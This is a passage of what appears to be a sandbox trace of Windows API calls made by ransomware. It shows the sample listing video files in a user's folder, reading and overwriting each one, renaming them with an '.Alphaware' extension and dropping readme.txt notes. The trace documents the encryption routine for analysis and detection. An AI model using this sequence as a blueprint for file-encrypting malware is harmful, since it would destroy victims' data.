[0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27eb30, ftCreationTime.dwHighDateTime=0x1d97616, ftLastAccessTime.dwLowDateTime=0x785315b0, ftLastAccessTime.dwHighDateTime=0x1d97681, ftLastWriteTime.dwLowDateTime=0x785315b0, ftLastWriteTime.dwHighDateTime=0x1d97681, nFileSizeHigh=0x0, nFileSizeLow=0x13f53, dwReserved0=0x0, dwReserved1=0x0, cFileName="2oPHHLW4PAP-6w6.avi", cAlternateFileName="2OPHHL~1.AVI")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c8e020, ftCreationTime.dwHighDateTime=0x1d974af, ftLastAccessTime.dwLowDateTime=0xd30ec370, ftLastAccessTime.dwHighDateTime=0x1d97594, ftLastWriteTime.dwLowDateTime=0xd30ec370, ftLastWriteTime.dwHighDateTime=0x1d97594, nFileSizeHigh=0x0, nFileSizeLow=0x14258, dwReserved0=0x0, dwReserved1=0x0, cFileName="CxBBv_wEg7u3rzm7.flv", cAlternateFileName="CXBBV_~1.FLV")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3402230, ftCreationTime.dwHighDateTime=0x1d96ba6, ftLastAccessTime.dwLowDateTime=0xde0e5310, ftLastAccessTime.dwHighDateTime=0x1d96e75, ftLastWriteTime.dwLowDateTime=0xde0e5310, ftLastWriteTime.dwHighDateTime=0x1d96e75, nFileSizeHigh=0x0, nFileSizeLow=0x18716, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gym-mdc1iNSfM4mpMZh.swf", cAlternateFileName="GYM-MD~1.SWF")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb024c0, ftCreationTime.dwHighDateTime=0x1d9692e, ftLastAccessTime.dwLowDateTime=0x7d5e9770, ftLastAccessTime.dwHighDateTime=0x1d96fc2, ftLastWriteTime.dwLowDateTime=0x7d5e9770, ftLastWriteTime.dwHighDateTime=0x1d96fc2, nFileSizeHigh=0x0, nFileSizeLow=0x29fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="kpu4EiFJZv7i.swf", cAlternateFileName="KPU4EI~1.SWF")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.708] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi", dwFileAttributes=0x80) returned 1 [0088.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\2ophhlw4pap-6w6.avi"), fInfoLevelId=0x0, lpFileInformation=0x24cdad0 | out: lpFileInformation=0x24cdad0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5f27eb30, ftCreationTime.dwHighDateTime=0x1d97616, ftLastAccessTime.dwLowDateTime=0x785315b0, ftLastAccessTime.dwHighDateTime=0x1d97681, ftLastWriteTime.dwLowDateTime=0x785315b0, ftLastWriteTime.dwHighDateTime=0x1d97681, nFileSizeHigh=0x0, nFileSizeLow=0x13f53)) returned 1 [0088.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.708] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\2ophhlw4pap-6w6.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.708] ReadFile (in: hFile=0x250, lpBuffer=0x24cdd48, nNumberOfBytesToRead=0x13f53, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24cdd48*, lpNumberOfBytesRead=0x23ea98*=0x13f53, lpOverlapped=0x0) returned 1 [0088.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.729] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\2ophhlw4pap-6w6.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.733] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\2ophhlw4pap-6w6.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27eb30, ftCreationTime.dwHighDateTime=0x1d97616, ftLastAccessTime.dwLowDateTime=0x785315b0, ftLastAccessTime.dwHighDateTime=0x1d97681, ftLastWriteTime.dwLowDateTime=0x87156ce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aaa0)) returned 1 [0088.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.733] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\2ophhlw4pap-6w6.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\2oPHHLW4PAP-6w6.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\2ophhlw4pap-6w6.avi.alphaware")) returned 1 [0088.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0088.734] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0088.735] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv", dwFileAttributes=0x80) returned 1 [0088.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\cxbbv_weg7u3rzm7.flv"), fInfoLevelId=0x0, lpFileInformation=0x259efa0 | out: lpFileInformation=0x259efa0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x91c8e020, ftCreationTime.dwHighDateTime=0x1d974af, ftLastAccessTime.dwLowDateTime=0xd30ec370, ftLastAccessTime.dwHighDateTime=0x1d97594, ftLastWriteTime.dwLowDateTime=0xd30ec370, ftLastWriteTime.dwHighDateTime=0x1d97594, nFileSizeHigh=0x0, nFileSizeLow=0x14258)) returned 1 [0088.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.736] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\cxbbv_weg7u3rzm7.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.736] ReadFile (in: hFile=0x250, lpBuffer=0x259f238, nNumberOfBytesToRead=0x14258, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x259f238*, lpNumberOfBytesRead=0x23ea98*=0x14258, lpOverlapped=0x0) returned 1 [0088.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.760] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\cxbbv_weg7u3rzm7.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\cxbbv_weg7u3rzm7.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c8e020, ftCreationTime.dwHighDateTime=0x1d974af, ftLastAccessTime.dwLowDateTime=0xd30ec370, ftLastAccessTime.dwHighDateTime=0x1d97594, ftLastWriteTime.dwLowDateTime=0x871a2fa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aea0)) returned 1 [0088.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.764] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\cxbbv_weg7u3rzm7.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\CxBBv_wEg7u3rzm7.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\cxbbv_weg7u3rzm7.flv.alphaware")) returned 1 [0088.765] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf", dwFileAttributes=0x80) returned 1 [0088.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.765] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\gym-mdc1insfm4mpmzh.swf"), fInfoLevelId=0x0, lpFileInformation=0x2454150 | out: lpFileInformation=0x2454150*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf3402230, ftCreationTime.dwHighDateTime=0x1d96ba6, ftLastAccessTime.dwLowDateTime=0xde0e5310, ftLastAccessTime.dwHighDateTime=0x1d96e75, ftLastWriteTime.dwLowDateTime=0xde0e5310, ftLastWriteTime.dwHighDateTime=0x1d96e75, nFileSizeHigh=0x0, nFileSizeLow=0x18716)) returned 1 [0088.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.766] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\gym-mdc1insfm4mpmzh.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.766] ReadFile (in: hFile=0x250, lpBuffer=0x12881180, nNumberOfBytesToRead=0x18716, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12881180*, lpNumberOfBytesRead=0x23ea98*=0x18716, lpOverlapped=0x0) returned 1 [0088.793] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\gym-mdc1insfm4mpmzh.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\gym-mdc1insfm4mpmzh.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3402230, ftCreationTime.dwHighDateTime=0x1d96ba6, ftLastAccessTime.dwLowDateTime=0xde0e5310, ftLastAccessTime.dwHighDateTime=0x1d96e75, ftLastWriteTime.dwLowDateTime=0x871ef260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20a48)) returned 1 [0088.797] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\gym-mdc1insfm4mpmzh.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\Gym-mdc1iNSfM4mpMZh.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\gym-mdc1insfm4mpmzh.swf.alphaware")) returned 1 [0088.798] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf", dwFileAttributes=0x80) returned 1 [0088.798] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\kpu4eifjzv7i.swf"), fInfoLevelId=0x0, lpFileInformation=0x23c68c8 | out: lpFileInformation=0x23c68c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5cb024c0, ftCreationTime.dwHighDateTime=0x1d9692e, ftLastAccessTime.dwLowDateTime=0x7d5e9770, ftLastAccessTime.dwHighDateTime=0x1d96fc2, ftLastWriteTime.dwLowDateTime=0x7d5e9770, ftLastWriteTime.dwHighDateTime=0x1d96fc2, nFileSizeHigh=0x0, nFileSizeLow=0x29fa)) returned 1 [0088.799] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\kpu4eifjzv7i.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.799] ReadFile (in: hFile=0x250, lpBuffer=0x23c6b40, nNumberOfBytesToRead=0x29fa, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23c6b40*, lpNumberOfBytesRead=0x23ea98*=0x29fa, lpOverlapped=0x0) returned 1 [0088.817] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\kpu4eifjzv7i.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\kpu4eifjzv7i.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb024c0, ftCreationTime.dwHighDateTime=0x1d9692e, ftLastAccessTime.dwLowDateTime=0x7d5e9770, ftLastAccessTime.dwHighDateTime=0x1d96fc2, ftLastWriteTime.dwLowDateTime=0x8723b520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x38c8)) returned 1 [0088.820] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\kpu4eifjzv7i.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\hWvMFQJJJ\\kpu4EiFJZv7i.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\hwvmfqjjj\\kpu4eifjzv7i.swf.alphaware")) returned 1 [0088.820] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedc0e0f0, ftCreationTime.dwHighDateTime=0x1d9726e, ftLastAccessTime.dwLowDateTime=0x8723b520, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8723b520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.820] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27eb30, ftCreationTime.dwHighDateTime=0x1d97616, ftLastAccessTime.dwLowDateTime=0x785315b0, ftLastAccessTime.dwHighDateTime=0x1d97681, ftLastWriteTime.dwLowDateTime=0x87156ce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aaa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2oPHHLW4PAP-6w6.avi.Alphaware", cAlternateFileName="2OPHHL~1.ALP")) returned 1 [0088.820] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c8e020, ftCreationTime.dwHighDateTime=0x1d974af, ftLastAccessTime.dwLowDateTime=0xd30ec370, ftLastAccessTime.dwHighDateTime=0x1d97594, ftLastWriteTime.dwLowDateTime=0x871a2fa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CxBBv_wEg7u3rzm7.flv.Alphaware", cAlternateFileName="CXBBV_~1.ALP")) returned 1 [0088.820] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3402230, ftCreationTime.dwHighDateTime=0x1d96ba6, ftLastAccessTime.dwLowDateTime=0xde0e5310, ftLastAccessTime.dwHighDateTime=0x1d96e75, ftLastWriteTime.dwLowDateTime=0x871ef260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gym-mdc1iNSfM4mpMZh.swf.Alphaware", cAlternateFileName="GYM-MD~1.ALP")) returned 1 [0088.820] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb024c0, ftCreationTime.dwHighDateTime=0x1d9692e, ftLastAccessTime.dwLowDateTime=0x7d5e9770, ftLastAccessTime.dwHighDateTime=0x1d96fc2, ftLastWriteTime.dwLowDateTime=0x8723b520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x38c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="kpu4EiFJZv7i.swf.Alphaware", cAlternateFileName="KPU4EI~1.ALP")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87156ce0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x87156ce0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8717ce40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87156ce0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x87156ce0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8717ce40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa07d4070, ftCreationTime.dwHighDateTime=0x1d96efb, ftLastAccessTime.dwLowDateTime=0xb369e3e0, ftLastAccessTime.dwHighDateTime=0x1d97366, ftLastWriteTime.dwLowDateTime=0xb369e3e0, ftLastWriteTime.dwHighDateTime=0x1d97366, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7756a10, ftCreationTime.dwHighDateTime=0x1d97463, ftLastAccessTime.dwLowDateTime=0x332a2e40, ftLastAccessTime.dwHighDateTime=0x1d9750c, ftLastWriteTime.dwLowDateTime=0x332a2e40, ftLastWriteTime.dwHighDateTime=0x1d9750c, nFileSizeHigh=0x0, nFileSizeLow=0xb472, dwReserved0=0x0, dwReserved1=0x0, cFileName="0o6jwd.mp4", cAlternateFileName="")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb41a2eb0, ftCreationTime.dwHighDateTime=0x1d974f3, ftLastAccessTime.dwLowDateTime=0x1259f070, ftLastAccessTime.dwHighDateTime=0x1d97583, ftLastWriteTime.dwLowDateTime=0x1259f070, ftLastWriteTime.dwHighDateTime=0x1d97583, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4_p930HVcZ_", cAlternateFileName="4_P930~1")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba9fe80, ftCreationTime.dwHighDateTime=0x1d96f79, ftLastAccessTime.dwLowDateTime=0x999afdc0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x999afdc0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0xc842, dwReserved0=0x0, dwReserved1=0x0, cFileName="8lwQtag2z.swf", cAlternateFileName="8LWQTA~1.SWF")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd61649a0, ftCreationTime.dwHighDateTime=0x1d972cc, ftLastAccessTime.dwLowDateTime=0xfdc2d8f0, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0xfdc2d8f0, ftLastWriteTime.dwHighDateTime=0x1d972e6, nFileSizeHigh=0x0, nFileSizeLow=0x15999, dwReserved0=0x0, dwReserved1=0x0, cFileName="bC7JKZ.swf", cAlternateFileName="")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b101bf0, ftCreationTime.dwHighDateTime=0x1d969e8, ftLastAccessTime.dwLowDateTime=0xe6a59110, ftLastAccessTime.dwHighDateTime=0x1d97603, ftLastWriteTime.dwLowDateTime=0xe6a59110, ftLastWriteTime.dwHighDateTime=0x1d97603, nFileSizeHigh=0x0, nFileSizeLow=0x4b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="jlPj6J.flv", cAlternateFileName="")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf85af2f0, ftCreationTime.dwHighDateTime=0x1d96c4a, ftLastAccessTime.dwLowDateTime=0x75a36f80, ftLastAccessTime.dwHighDateTime=0x1d97493, ftLastWriteTime.dwLowDateTime=0x75a36f80, ftLastWriteTime.dwHighDateTime=0x1d97493, nFileSizeHigh=0x0, nFileSizeLow=0xdb5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MADiRK5BENdO7pHH.flv", cAlternateFileName="MADIRK~1.FLV")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e3bf710, ftCreationTime.dwHighDateTime=0x1d96e1f, ftLastAccessTime.dwLowDateTime=0xc6dcea00, ftLastAccessTime.dwHighDateTime=0x1d970ad, ftLastWriteTime.dwLowDateTime=0xc6dcea00, ftLastWriteTime.dwHighDateTime=0x1d970ad, nFileSizeHigh=0x0, nFileSizeLow=0x10f9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ptfdx.mp4", cAlternateFileName="")) returned 1 [0088.821] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.821] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4", 